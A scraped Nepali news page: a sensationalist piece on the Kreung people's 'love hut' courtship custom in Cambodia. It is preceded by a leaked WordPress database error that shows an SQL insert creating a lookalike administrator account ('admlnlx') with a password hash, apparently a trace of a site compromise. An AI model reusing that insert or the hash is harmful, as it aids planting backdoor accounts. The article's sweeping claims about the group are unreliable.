WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bjz8C8c6svjLh0lYnBH0i993RHedDl.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 01:45:29', '', 'admlnlx', 'admlnlx')
एजेन्सी । दुनियामा विहे गर्ने अनेकौं परम्परा छन् । तर, केही परम्पराले दुनियालाई चकित बनाउँछन् । यस्तै एक परम्पराका अनुसार महिलाहरु कैयौं पुरुषसंग सम्बध बनाएर आफ्तो पति रोज्छन् ।
कम्बोडियाको क्रिउन जनजातिमा विहेको लागि यस्तै परम्परा अपनाउछन् । यो जातिको विवाह गर्ने उमेरको केटीहरु कैयौं केटाहरुसंग सम्बन्ध बनाउन तयार हुन्छन् ।
केटीको सुविधाका लागि उनकै पिताले घर भन्दा केही टाढा बस्ने ठाउँ ‘लव हट’ बनाउछन् । घरका मानिसहरु केटीको सम्बन्ध बनाउनका लागि सहयोग गर्छन् । सो हटमा केटीका लागि तमाम सुविधा पनि दिइएको हुन्छ ।
केटी तबसम्म कैयौं केटासंग यौन सम्बन्ध बनाउँछिन जबसम्म विहेका लागि उपयुक्त केटा साथी मिल्न सक्दैनन् । यसमा केटा र केटीबीचको सम्बन्धलाई कोही रोकटोक गर्दैनन् ।
कसैको पनि साथ र सम्बन्ध बनाउनका लागि तयार हुन्छन् ।
अचम्मको कुरा के छ भने दुनिया एड्स वा एचआईभीसंग लडिरहेको छ । तर, यस जातिमा युवाहरुलई बिना कुनै सुरक्षाका साथ यौन सम्बन्ध बनाउनका लागि खुल्ला रुपमा प्रोत्साहित गर्छन् ।
हेर्नुस् केही तस्वीरहरुः